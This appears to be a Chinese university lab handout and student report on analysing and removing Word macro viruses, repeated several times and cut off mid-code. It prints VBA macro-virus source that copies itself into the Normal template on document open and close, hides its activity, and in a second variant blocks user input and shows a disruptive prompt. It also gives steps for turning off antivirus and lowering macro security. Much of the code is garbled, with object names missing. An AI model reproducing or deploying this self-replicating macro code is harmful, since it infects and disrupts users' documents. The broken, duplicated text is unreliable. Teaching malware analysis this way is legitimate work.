宏病毒分析及清除实验总结

1 / 41 宏病毒分析及清除实验总结 实验七 计算机宏病毒分析及清除实验 一、实验目的 ? 了解 “ 宏病毒 ” 机理； ? 掌握清除宏病毒的方法； ? 掌握采用 “ 宏 ” 和脚本语言进行编程的技术。 二、实验时数： 2 小时 三、实验 环境 ? Windows 2000/XX/XP 或更高级别的 Windows 操作系统； ? Office Word 2000/XX 等字处理软件。 2 / 41 四、实验要求 ? 演示宏的编写； ? 理解宏病毒的作用机制。 五、实验步骤： 1软 件设置 关闭杀毒软件；打开 Word字处理软件，在工具 “ 宏 ” 的 “ 安全性 ” 中，将 “ 安全级 ” 设置为低，在 “ 可靠发行商 ” 选项卡中，选择信任任何所有安装的加载项和模板，选择 “ 信任visual basic 项目的访问 ” 。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打 开过多的 word 文档，否则清除比较麻烦。 2自我复制功能演示 打开一个 word文档，然后按 Alt+F11 调用宏编写窗口 ,在左3 / 41 侧的 “project Microsoft Word” 对象 “ThisDocument”中输入以下代码，保存，此时当前 word文档就含有宏病毒，只要下次打开这个 word 文档，就会执行以上代码，并将自身复制到和当前文档的 ThisDocument 中，同时改变函数名，此时所有的 word 文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响 word 的正常使用，本例中只是简单的跳出一个提示框。 完整代码如下： Macro-1： Micro-Virus Sub Document_Open() On Error Resume Next = False = False Set ourcodemodule = (1).CodeModule 4 / 41 Set host = (1).CodeModule If ThisDocument = NormalTemplate Then Set host = (1).CodeModule End If With host If .Lines(1, 1) Micro-Virus Then .DeleteLines 1, .CountOfLines .InsertLines 1, (1, 100) .ReplaceLine 2, Sub Document_Close() If ThisDocument = NormalTemplate Then .ReplaceLine 2, Sub Document_Open() 5 / 41 End If End If End With MsgBox MicroVirus by Content Security Lab End Sub 以上代码的基本执行流程如下： 1) 进行必要的自我保护 : = False = False 高明的病毒编写者其自我保护将做得非常好，可以使 word的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。 6 / 41 本例中只是屏蔽状态栏，以免显示宏的运行状态，并且修改公用模板时自动保存，不给用户提示。 2) 得到当前文档的代码对象和公用模板的代码对象 : Set ourcodemodule = (1).CodeModule Set host = (1).CodeModule If ThisDocument = NormalTemplate Then Set host = (1).CodeModule End If 3) 检查模板是否已经感染病毒，如果没有，则复制宏病毒代码到模板，并且修改函数名 : With Host If .Lines() Micro-Virus Then 7 / 41 .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, Sub Document_Close() If ThisDocument = nomaltemplate Then .ReplaceLine 2, Sub Document_Open() End If End If End With 4) 执行恶意代码 MsgBox MicroVirus by Content Security Lab 3具有一定破坏性的宏 8 / 41 我们可以对上例中的恶意代码稍加修改，使其具有一定的破坏性。 完整代码如下： Macro_2： moonlight Dim nm(4) Sub Document_Open() DisableInput 1 Set ourcodemodule = (1).CodeModule Set host = (1).CodeModule If ThisDocument = NormalTemplate Then Set host = (1).CodeModule 9 / 41 End If With host If .Lines(1, 1) moonlight Then .DeleteLines 1, .CountOfLines .InsertLines 1, (1, 100) .ReplaceLine 3, Sub Document_Close() If ThisDocument = NormalTemplate Then .ReplaceLine 3, Sub Document_Open() End If End If End With 10 / 41 Count = 0 If Year(Now() = 2016 Then try: On Error GoTo try test = -1 con = 1 tog$ = i = 0 While test = -1 For i = 0 To 4 nm(i) = Int(Rnd() * 10) 11 / 41 con = con * nm(i) If i = 4 Then tog$ = tog$ + Str$(nm(4) + =? GoTo beg End If tog$ = tog$ + Str$(nm(i) + * Next i beg: Beep ans$ = InputBox$(今天是 + Date$ + ,跟你玩一个心算游戏 + Chr$(13) + 若你答错，只好接受震撼教育 . + Chr$(13) + tog$, 台湾 Macro Virus) 12 / 41 If RTrim$(LTrim$(ans$) = LTrim$(Str$(con) Then = wdAlignParagraphCenter Beep With .Name = 细明体 .Size = 16 .Bold = 1 .Underline = 1 End With Text:=何谓宏病毒 13 / 41 Beep Text:=答案： = 1 Text:=我就是 . = 0 宏病毒分析及清除实验 实验目的 演示宏的编写 说明宏的原理及其安全漏洞和缺陷 理解宏病毒的作用机制。 14 / 41 实验环境 Windows系列操作系统； Word XX应用程序。 实验学时 2 学时，必做实验。 实验内容 1设置实验环境； 2打开带宏病毒的 Word文档； 3查看感染过程，分析病毒； 4杀毒。 实验步骤： 15 / 41 1软件设 置：关闭杀毒软件；打开 Word XX，在工具 -宏 -安全性中，将安全级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任 visual basic项目的访问。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的 word 文档，否则清除比较麻烦。 运行宏病毒 打开和创建若干 .DOC 文档，没有任何不正常的地方。 打开带有宏病毒的文件： “ 宏病毒 .DOC” ，存盘关闭。查看感染过程 3自我复制功能演示。 新建或打开若干文档，查看自我复制和传染过程。 4查看宏病毒 16 / 41 打开一 个 “ 宏病毒 .DOC” 文档，然后按 Alt+F11调用宏编写窗口 , 在 左 侧 的 project-Microsoft Word 对象-ThisDocument 中查看到 VB 代码，保存，表明当前 word 文档含有宏病毒，并将自身复制到。此时所有的 word 文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响 word 的正常使用，本例中只是简单的跳出一个提示框。 计算机宏病毒分析及清除 实验 一、实验目的 ? 了解 “ 宏病毒 ” 机理； ? 掌握清除宏病毒的方法； ? 掌握采用 “ 宏 ” 和脚本语言进行编程的技术。 二、实验时数： 2 小时 三、实验环境 17 / 41 ? Windows 2000/XX/XP 或更高级别的 Windows 操作系统； ? Office Word 2000/XX 等字处理软件。 四、实验要求 ? 宏的编写； ? 理解宏病毒的作用机制。 五、实验步骤： 1软件设置 关闭杀毒软件；打开 Word字处理软件，在工具 “ 宏 ” 的 “ 安全性 ” 中，将 “ 安 全级 ” 设置为低，在 “ 可靠发行商 ” 选项卡中，选择信任任何所有安装的加载项和模板，选择 “ 信任visual basic 项目的访问 ” 。 注意：为了保证该实验不至于造成较大的破坏性，进行实验18 / 41 感染后，被感染终端不要打开过多的 word 文档，否则清除比较麻烦。 2自我复制功能演示 打开一个 word文档，然后按 Alt+F11 调用宏编写窗口 ,在左侧的 “project Microsoft Word” 对象 “ThisDocument”中输入以下代码，保存，此时当前 word文档就含有宏病毒，只要下次打开这个 word 文档，就会执行以上代码，并将自身复制到和当前文档的 ThisDocument 中，同时改变函数名，此时所有的 word 文档打开和关闭时，都将运行以上的病毒代码，可以加入适当的恶意代码，影响 word 的正常使用，本例中只是简单的跳出一个提示框。 完整代码如下： Macro-1： Micro-Virus Sub Document_Open() On Error Resume Next 19 / 41 = False = False Set ourcodemodule = (1).CodeModule Set host = (1).CodeModule If ThisDocument = NormalTemplate Then Set host = (1).CodeModule End If With host If .Lines(1, 1) Micro-Virus Then .DeleteLines 1, .CountOfLines .InsertLines 1, (1, 100) 20 / 41 .ReplaceLine 2, Sub Document_Close() If ThisDocument = NormalTemplate Then .ReplaceLine 2, Sub Document_Open() End If End If End With MsgBox MicroVirus by Content Security Lab End Sub 以上代码的基本执行流程如下： 1) 进行必要的自我保护 : = False 21 / 41 = False 高明的病毒编写者其自我 保护将做得非常好，可以使 word的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。 本例中只是屏蔽状态栏，以免显示宏的运行状态，并且修改公用模板时自动保存，不给用户提示。 2) 得到当前文档的代码对象和公用模板的代码对象 : Set ourcodemodule = (1).CodeModule Set host = (1).CodeModule If ThisDocument = NormalTemplate Then Set host = (1).CodeModule End If 3) 检查模板是否已经感染病毒，如果没有，则复制宏病毒22 / 41 代码到模板，并且修改函数名 : With Host If .Lines() Micro-Virus Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode .ReplaceLine 2, Sub Document_Close() If ThisDocument = nomaltemplate Then .ReplaceLine 2, Sub Document_Open() End If End If End With 23 / 41 4) 执行恶意代码 MsgBox MicroVirus by Content Security Lab 3具有一定破坏性的宏 我们可以对上例中的恶意代码稍加修改，使其具有一定的破坏性。 完整代码如下： Macro_2： moonlight Dim nm(4) Sub Document_Open() DisableInput 1 Set ourcodemodule = (1).CodeModule 24 / 41 Set host = (1).CodeModule If ThisDocument = NormalTemplate Then Set host = (1).CodeModule End If With host If .Lines(1, 1) moonlight Then .DeleteLines 1, .CountOfLines .InsertLines 1, (1, 100) .ReplaceLine 3, Sub Document_Close() If ThisDocument = NormalTemplate Then .ReplaceLine 3, Sub Document_Open() 25 / 41 End If End If End With Count = 0 If Year(Now() = 2016 Then try: On Error GoTo try test = -1 con = 1 tog$ = i = 0 26 / 41 While test = -1 For i = 0 To 4 nm(i) = Int(Rnd() * 10) con = con * nm(i) If i = 4 Then tog$ = tog$ + Str$(nm(4) + =? GoTo beg End If tog$ = tog$ + Str$(nm(i) + * Next i beg: 27 / 41 Beep ans$ = InputBox$(今天是 + Date$ + ,跟你玩一个心算游戏 + Chr$(13) + 若你答错，只好接受震撼教育 . + Chr$(13) + tog$, 台湾 Macro Virus) If RTrim$(LTrim$(ans$) = LTrim$(Str$(con) Then = wdAlignParagraphCenter Beep With .Name = 细明体 .Size = 16 .Bold = 1 28 / 41 .Underline = 1 End With Text:=何谓宏病毒 Beep Text:=答案： = 1 Text:=我就是 . = 0 网络安全实验报告 实验五 宏病毒分析及清除实验 29 / 41 姓名： xxx 学号： xxxxxxxx 日期： 2016 年 4月 26日 专业：计算机科学与技术 一、实验目的 ? 了解 “ 宏病毒 ” 机理； ? 掌握清除宏病毒的方法； ? 掌握采用 “ 宏 ” 和脚本语言进行编程的技术。 二、实验环境 ? Windows XX 操作系统； ? Office Word XX 字处理软件。 30 / 41 三、实验内容 1软件设置 关闭杀毒软件；打开 Word字处理软件，在工具 “ 宏 ” 的 “ 安全性 ” 中，将 “ 安全级 ” 设置为低 ，在 “ 可靠发行商 ” 选项卡中，选择信任任何所有安装的加载项和模板，选择 “ 信任visual basic 项目的访问 ” 。 注意：为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要打开过多的 word 文档，否则清除比较麻烦。 2自我复制功能演示 打开一个 word文档，然后按 Alt+F11 调用宏编写窗口 ,在左侧的 “project Microsoft Word” 对象 “ThisDocument”中输入以下代码，保存，此时当前 word文档就含有宏病毒，只要下次打开这个 word 文档，就会执行以上代码，并将自身复制到和当前文档的 ThisDocument 中，同时改变函数名，此时所有的 word 文档打开和关闭时，都将运行以上的病毒31 / 41 代码，可以加入适当的恶意代码，影响 word 的正常使用 ，本例中只是简单的跳出一个提示框。 完整代码如下： Macro-1： Micro-Virus Sub Document_Open() On Error Resume Next = False = False Set ourcodemodule = (1).CodeModule Set host = (1).CodeModule If ThisDocument = NormalTemplate Then Set host = (1).CodeModule 32 / 41 End If With host If .Lines(1, 1) Micro-Virus Then .DeleteLines 1, .CountOfLines .InsertLines 1, (1, 100) .ReplaceLine 2, Sub Document_Close() If ThisDocument = NormalTemplate Then .ReplaceLine 2, Sub Document_Open() End If End If 33 / 41 End With MsgBox MicroVirus by Content Security Lab End Sub 以上代码的基本执行流程如下： 1) 进行必要的自我保护 : = False = False 病毒编写者的自我保护做得非常好，可以 使 word 的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。 本例中只是屏蔽状态栏，以免显示宏的运行状态，并且修改公用模板时自动保存，不给用户提示。 2) 得到当前文档的代码对象和公用模板的代码对象 : 34 / 41 Set ourcodemodule = (1).CodeModule Set host = (1).CodeModule If ThisDocument = NormalTemplate Then Set host = (1).CodeModule End If 3) 检查模板是 否已经感染病毒，如果没有，则复制宏病毒代码到模板，并且修改函数名 : With Host If .Lines() Micro-Virus Then .DeleteLines 1, .CountOfLines .InsertLines 1, Ourcode 35 / 41 .ReplaceLine 2, Sub Document_Close() If ThisDocument = nomaltemplate Then .ReplaceLine 2, Sub Document_Open() End If End If End With 4) 执行恶意代码 MsgBox MicroVirus by Content Security Lab 3具有一定破坏性的宏 我们可以对上例中的恶意代码稍加修改，使其具有一定的破坏性。 36 / 41 完整 代码如下： Macro_2： moonlight Dim nm(4) Sub Document_Open() DisableInput 1 Set ourcodemodule = (